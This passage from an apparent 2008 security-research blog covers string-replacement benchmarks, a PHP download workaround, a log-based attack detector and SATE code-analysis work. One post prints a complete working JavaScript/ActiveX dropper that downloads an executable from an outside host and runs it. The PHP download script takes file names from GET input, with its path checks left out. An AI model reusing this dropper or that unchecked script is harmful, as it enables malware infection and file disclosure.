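trie = build_trie({"ba": "X", "me": "Y", "mp": "Z"})
print(trie_replace("bamboo lamp meme", trie))
```

One difference with the loop of successive replacements is worth keeping in mind: a single pass never re-reads text it has just produced, so the two approaches can give different results when a replacement contains another dictionary word.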
I ran a little statistical comparison between the two algorithms: mine and the
simple loop one. The test bed is quite simple and uses randomly generated text
which contains the words to replace with a certain density. In order to build
statistics, I made all the sizes vary and I aggregated the results obtained
for the same dictionary size. So, for a given dictionary size (let's say, 200
words to replace), texts have been generated with a density that varies from
0.1 to 0.5 (from 10% to 50% of the words in the text are words to replace)
and with a size that varies from 25 to 200 words (the words are randomly
generated with a length from 5 to 32).
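A test bed along these lines could be generated as follows. This is only a sketch under my own assumptions (lowercase letters, words separated by single spaces, a fixed seed); the original generator is not shown in this post, and all the names are hypothetical.

```python
import random
import string

def random_word(rng, min_len=5, max_len=32):
    """Random lowercase word whose length is drawn from [min_len, max_len]."""
    length = rng.randint(min_len, max_len)
    return "".join(rng.choice(string.ascii_lowercase) for _ in range(length))

def make_test_case(rng, dict_size, text_size, density):
    """Return (dictionary, text) where about `density` of the words in the
    text are taken from the dictionary of words to replace."""
    dictionary = [random_word(rng) for _ in range(dict_size)]
    words = [
        rng.choice(dictionary) if rng.random() < density else random_word(rng)
        for _ in range(text_size)
    ]
    return dictionary, " ".join(words)

rng = random.Random(42)  # fixed seed so that runs are repeatable
for density in (0.1, 0.3, 0.5):
    dictionary, text = make_test_case(rng, dict_size=200, text_size=100,
                                      density=density)
    known = set(dictionary)
    hits = sum(word in known for word in text.split())
    print(density, hits, "of", len(text.split()), "words are replaceable")
```

Timing both replacement methods on the generated pairs, and averaging per dictionary size, then gives the kind of aggregated numbers discussed here.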
As I said previously, the results for a same dictionary size have been
aggregated, since I've seen in practice that the result mainly depends on the
dictionary size (it obviously also depends on the size of the text, but as
this is the same for the 2 algorithms, I can compute the mean over the
different data to extract the average gain for a particular dictionary size).
Finally, here is the curve that shows the logarithmic progression of the gain compared to the classical method:

The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):
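#include <string>
using std::string;

// Replace every occurrence of `what` in `where` with `by`, in place.
void str_replace(string& where, const string& what, const string& by) {
    if (what.empty()) return;  // find("") always matches: avoid looping forever
    for (string::size_type i = where.find(what);
         i != string::npos;
         i = where.find(what, i + by.size()))  // resume after the inserted text
        where.replace(i, what.size(), by);
}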
and has been used M times (M is the size of the dictionary).
One morning, I woke up and none of the websites using a download system worked anymore. Yeah, that is what I saw. I guess I don't need to tell you what a pain it was to find the download systems of all our websites broken.
It was quite stressful to think at first that everything was broken, and then to realize after some time that the problem was the Content-Disposition header field being dropped.
I wouldn't exactly thank the admins who don't tell people about such modifications... Anyway, I guess it is like that every time?
The Content-Disposition HTTP header field is used to tell the browser how the data should be presented. I basically use it to force a download, with a PHP script like this one:
<?php
// download.php
// some checks on the $fname, variable to be sure
// it exists and is in the allowed directories...
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, pre-check=0");
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($fname));
header("Content-Disposition: attachment; filename=".basename($fname));
header("Content-Description: File Transfer");
@readfile($fname);
exit;
?>
Now, if you cannot send the Content-Disposition field, the browser will download a file called "download.php". A quite simple solution is to fool the browser by making the name of the reachable URI the same as the name of the file it should download, using mod_rewrite.
RewriteEngine On
RewriteBase /mydir
RewriteRule ^download/([^/]+)$ /mydir/download.php?file_redir=$1
Then, a simple modification in the original script detects the "file_redir" GET variable. But since we don't want to modify all the (generated or not) HTML files, the redirection has to be done automatically.
<?php
// download.php
// some checks on the $fname, variable to be sure
// it exists and is in the allowed directories...
if (isset($_GET['file_redir'])) {
$fname = $_GET['file_redir'];
// checks for good files (careful of directory traversal etc.)
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, pre-check=0");
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($fname));
header("Content-Description: File Transfer");
@readfile($fname);
exit;
}
else {
header("Location: /mydir/download/$fname");
exit;
}
?>
Then you don't have to change all your pages. This is of course a (not so?) temporary solution since the server will do extra work in order to go to the same state, the download of the file, but well, it does the job to fool the browser...
I started a project some time ago to parse Apache log files and detect attacks in them. The attack recognition is based on the PHP-IDS filters.
The first released version is written in Python (http://code.google.com/p/apache-scalp/downloads/list), but I started (well, almost finished) a faster, multi-threaded C++ version in order to handle bigger log files.
The main project page is reachable here: http://code.google.com/p/apache-scalp
Scalp the apache log! - http://code.google.com/p/apache-scalp
usage: ./scalp.py [--log|-l log_file] [--filters|-f filter_file]
[--period time-frame] [OPTIONS] [--attack a1,a2,..,an]
--log |-l: the apache log file './access_log' by default
--filters |-f: the filter file './default_filter.xml' by default
--exhaustive|-e: will report all type of attacks detected and not stop
at the first found
--period |-p: the period must be specified in the same format as in
the Apache logs using * as wild-card
ex: 04/Apr/2008:15:45;*/Mai/2008
if not specified at the end, the max or min are taken
--html |-h: generate an HTML output
--xml |-x: generate an XML output
--text |-t: generate a simple text output (default)
--except |-c: generate a file that contains the non examined logs due
to the main regular expression; ill-formed Apache log etc.
--attack |-a: specify the list of attacks to look for
list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi
the list of attacks should not contains spaces and be comma
separated
ex: xss,sqli,lfi,ref
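To give an idea of what such a scan involves, here is a minimal sketch in Python. It is not the code of scalp: the main regular expression only covers the beginning of an Apache common log line, and the three filters are deliberately naive placeholders that I made up, not the PHP-IDS rules.

```python
import re

# Apache common log format prefix: host ident user [date] "request" status size
LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<date>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Hypothetical, deliberately naive filters (NOT the PHP-IDS rules).
FILTERS = {
    "xss": re.compile(r"<script|%3Cscript", re.IGNORECASE),
    "sqli": re.compile(r"union(\s|\+|%20)+select", re.IGNORECASE),
    "dt": re.compile(r"\.\./|%2e%2e%2f", re.IGNORECASE),
}

def scan(lines, exhaustive=False):
    """Return (findings, skipped): findings are (attack, host, url) tuples,
    skipped are the lines the main regular expression could not parse."""
    findings, skipped = [], []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            skipped.append(line)
            continue
        for attack, pattern in FILTERS.items():
            if pattern.search(m.group("url")):
                findings.append((attack, m.group("host"), m.group("url")))
                if not exhaustive:
                    break  # stop at the first attack type found
    return findings, skipped

# Made-up log lines for the demonstration.
sample = [
    '10.0.0.1 - - [04/Apr/2008:15:45:01 +0200] "GET /index.php?id=1+UNION+SELECT+1 HTTP/1.1" 200 512',
    '10.0.0.2 - - [04/Apr/2008:15:46:10 +0200] "GET /view.php?f=../../etc/passwd HTTP/1.1" 404 209',
    'not an apache log line',
]
findings, skipped = scan(sample)
for attack, host, url in findings:
    print(attack, host, url)
print(len(skipped), "line(s) not examined")
```

The `exhaustive` flag and the list of skipped lines mirror the ideas behind the --exhaustive and --except options listed above.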
It has been some time since I last posted on my blog... well, I've been
busy, especially with the end of SATE, and oh well! I had a vacation
:)
Anyway, at the next Static Analysis Workshop this Thursday, we're gonna talk about the SATE experiment and the observations/results we got from it. I am then gonna talk about a tool I wrote to check whether a reported weakness is a false-positive: this is the Automated Evaluation.
The main idea of the Automated Evaluation is to gather some information from the source code and, under some assumptions, try to reach a conclusion about the correctness of the piece of code. The reasoning behind this tool had to be radically different from a classical SCA; otherwise, it would have been like creating a new SCA, which would obviously have been useless. The scope of this automated evaluation is limited to buffer overflows, and it can only be used to show that a report is a false-positive!
So basically, I read the source code from the reported sink back to the possible sources, grabbing the actions that may affect the variables that play a role in the code.
These actions are like:
Then, each time such an action is detected, the tool increments a global false-positiveness score for the reported weakness. We then only have to set a threshold according to the level of confidence we want; this is really tied to the source code and to how the program is developed.
Even though this evaluation method is not perfect, it was well suited to the C test cases we had in SATE 2008, since the overall code quality was good. We can even say that the software was well written; it was therefore okay to make some assumptions about the code, such as:
Also, the tool itself needs some information about the source code, since it uses regular expressions to match the "actions"...
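The scoring idea can be sketched as follows in Python. The actions, their weights and the threshold below are hypothetical examples chosen for the illustration; they are not the ones used by the actual tool, and the sketch scans a flat list of lines instead of walking from the sink back to the sources.

```python
import re

# Hypothetical "actions" and weights, for illustration only; the tool's real
# list is not reproduced here.
ACTIONS = [
    (re.compile(r"\bif\s*\(.*\b(sizeof|strlen)\s*\("), 2),  # explicit length check
    (re.compile(r"\b(strncpy|snprintf|strncat)\s*\("), 1),  # bounded library call
    (re.compile(r"\bassert\s*\("), 1),                      # asserted invariant
]

def false_positive_score(lines, variable):
    """Sum the weights of the actions found on lines that mention `variable`."""
    mentions = re.compile(r"\b" + re.escape(variable) + r"\b")
    score = 0
    for line in lines:
        if not mentions.search(line):
            continue
        for pattern, weight in ACTIONS:
            if pattern.search(line):
                score += weight
    return score

def looks_like_false_positive(lines, variable, threshold=2):
    """Apply the (arbitrary) threshold to the score."""
    return false_positive_score(lines, variable) >= threshold

# Made-up C fragment around a reported sink.
snippet = [
    "if (len < sizeof(buf)) {",
    "    strncpy(buf, src, len);",
    "}",
]
print(false_positive_score(snippet, "buf"),
      looks_like_false_positive(snippet, "buf"))
```

Raising the threshold makes the verdict more conservative, which is the tuning knob mentioned above.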
So much for the quick explanation; here are the slides: SAW: Automated
Evaluation of SCA output
I was just reading this news (reported by Kanedaa) and decided to take a closer look at the content of this "malware" stuff, to see if there were some nice techniques behind this so-called "attack".
Oh man! How disappointing to see that this was done by script kiddies... the "obfuscation" consists of 3 levels of URL-encoded JavaScript... yeah... URL encoding is for sure an obfuscation that is very hard to prettify. And the final code was not obfuscated either... Just this:
function myCreateOB(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} }
if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n)') }catch(e){} }
return(r);
}
function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
var e = s.Environment("Process");
var xml = null;
var url = 'http://ad.ox88.info/bbs.jpg';
var bin = e.Item("TEMP") + "svchost.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
function mywoewd() {
var i = 0;
var ss11='{7F5B7F';
var ss12='63-F06';
var ss13='F-4331-8A';
var ss14='26-339E0'
var ss15='3C0AE3D}';
var ss1=ss11+ss12+ss13+ss14+ss15
var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";
var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
if (b) {
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
}
As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)
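To show how little work the three levels of URL encoding represent, here is a small Python sketch that peels them off. The helper name and the harmless stand-in payload are mine; the real sample is not reproduced in encoded form here.

```python
from urllib.parse import quote, unquote

def peel_url_encoding(payload, max_levels=10):
    """Apply URL decoding until the text stops changing.

    Returns the decoded text and the number of levels removed.
    """
    levels = 0
    while levels < max_levels:
        decoded = unquote(payload)
        if decoded == payload:
            break
        payload = decoded
        levels += 1
    return payload, levels

# Harmless stand-in for the script, encoded three times like the sample.
original = 'alert("hello");'
encoded = original
for _ in range(3):
    encoded = quote(encoded, safe="")
print(peel_url_encoding(encoded))
```

The `max_levels` guard is only there to bound the loop; a payload that legitimately contains percent signs would need a closer look before decoding it blindly.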
Romain | Friday, May 16 2008 - 14:43 UTC | Discussion
If, like me, you are interested in code quality and in the general conclusions one can draw from code quality studies, I really recommend reading this paper: A Tale of Four Kernels by Diomidis Spinellis, ICSE '08: Proceedings of the 30th International Conference on Software Engineering
I just want to quote a part of the author's conclusion:
Therefore, the most we can read from the overall balance of marks is that open source development approaches do not produce software of markedly higher quality than proprietary software development.
The only problem with this statement is that the metrics he used were not weighted by their importance for "Code Quality" (if this means something). Therefore, the comparison between the Windows Research Kernel and Linux seems a little bit awkward to me. Anyway, this is a very interesting paper about code quality, with lots of interesting ideas from the author of CScout.
Romain | Wednesday, May 14 2008 - 00:20 UTC | Discussion
Yeah, that's sad and also a relief: SATE is over. Today we actually released the last stage of the evaluation (basically, the evaluation with some corrections based on comments from the participants). Even though I would have preferred more feedback from the participants on our evaluation, especially to increase its quality, I still think SATE is a good thing and will be an interesting resource for lots of researchers. This is, as far as I know, the only exhaustive resource on the subject (wild source code + weaknesses).
What do I want to do and see next? Since we have accumulated lots of data with the tool reports (raw weaknesses) and the evaluations (I really want to thank the MITRE guys, especially Steve Christey and Bob Schmeichel, for their help), I'm looking forward to doing some data analysis and trying to extract some limited results from it.
Anyway, this was overall a good experience. I did my first real code review, mostly on lighttpd, dspace, mvnform and naim, and I think I know way more about how to detect vulnerabilities. I have also been asking myself how to rate vulnerabilities such as Cross-Site Scripting (hopefully, I will release the little document I wrote about it). And I learned so much about how people write code, by trying to understand the design, the code etc. of the applications.
Also, hopefully, I will be able to release the website I developed to handle the weaknesses from different tools. It is, I think, interesting if you are working with more than one assessor: you can send evaluations and comments, merge weaknesses etc. through a web interface. Even though it needs improvements (it was done in less than 2 weeks), I think it would be an interesting piece of software for people who are dealing with tons of weaknesses. Another interesting point is that we (at NIST) may open that website to everybody, so that new evaluations can increase the quality of the data we currently have.
Oh well, it seems like a journey is really close to its end; sometimes it was such a good time, and at other times such consuming work. We've been dealing with about fifty thousand weaknesses, dozens of tool reports, and almost ten test cases... I will keep you posted about the next decisions we are gonna make with SATE, and I hope that lots of people will get the most out of this "exposition".
Romain | Saturday, May 10 2008 - 11:30 UTC | Discussion
Yesterday, I came across a case in a piece of software that was really hard for me to understand perfectly. Not only is the code well written (which always makes finding bugs harder :)), but the structure is also well thought out (this is the implementation of an associative array in C in the lighttpd application).
The problem I had was to decide whether a tool report was a true-positive or a false-positive. As in many cases I've seen in this software, a problem may only occur in the limit cases. This one may occur after INT_MAX insertions in the structure. I don't know if any of you ever tried to do such a thing, but INT_MAX (~2 billion on a typical PC) allocations alone is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. I also ran this test with valgrind using the memory leak check (full check and high definition).
I then ran a simple test program to fill this structure under real conditions: a typical x86/32-bit architecture. As I knew this was stupid, and didn't even think it could finish within 2 days, I started looking in another direction: reducing INT_MAX in order to get a reasonable execution time for the test.
My first attempt was to shrink all the types that are used. I knew this was not perfect, because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers: a char * would still be 32-bit (there may be some gcc options to control the size of the pointers, which I doubt, but I didn't find any).
Using this methodology, I was able to make the program crash in a way that would have been a real true-positive.
But I knew this was not good enough, since the size of the pointers is not modified, and I had the feeling that in this particular structure the possible crash is prevented by the structure itself (due to pointer and type limits). So I started looking in another direction: running the program in 16-bit, a pseudo-real 16-bit mode. I looked into emulators and into how to compile code for 16-bit and run it on my Linux box (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with the ELKS utilities, the test program didn't crash; it only failed on an assertion after an allocation...
Different behavior with different methods, okay... which one is correct? Is it the pointer size that made the test run differently from the real program on 32-bit, or maybe a limitation of the elksemu machine? This morning, I checked the state of the 32-bit run I launched yesterday, and it was finished... ended by a failed assertion.
As expected, pointer size matters when you wanna test the intrinsic limitations of a structure and its behavior in limit cases.
I've just come across this interesting blog entry: some numbers on how people (large website companies) are actually using MySQL.
http://venublog.com/2008/04/16/notes-from-scaling-mysql-up-or-out/